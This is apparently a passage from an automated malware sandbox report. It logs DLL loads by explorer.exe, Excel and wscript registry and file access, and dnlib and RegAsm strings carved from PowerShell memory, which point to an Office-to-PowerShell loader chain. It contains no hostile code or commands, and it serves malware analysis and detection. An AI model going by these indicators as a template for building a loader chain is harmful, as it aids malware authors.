            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
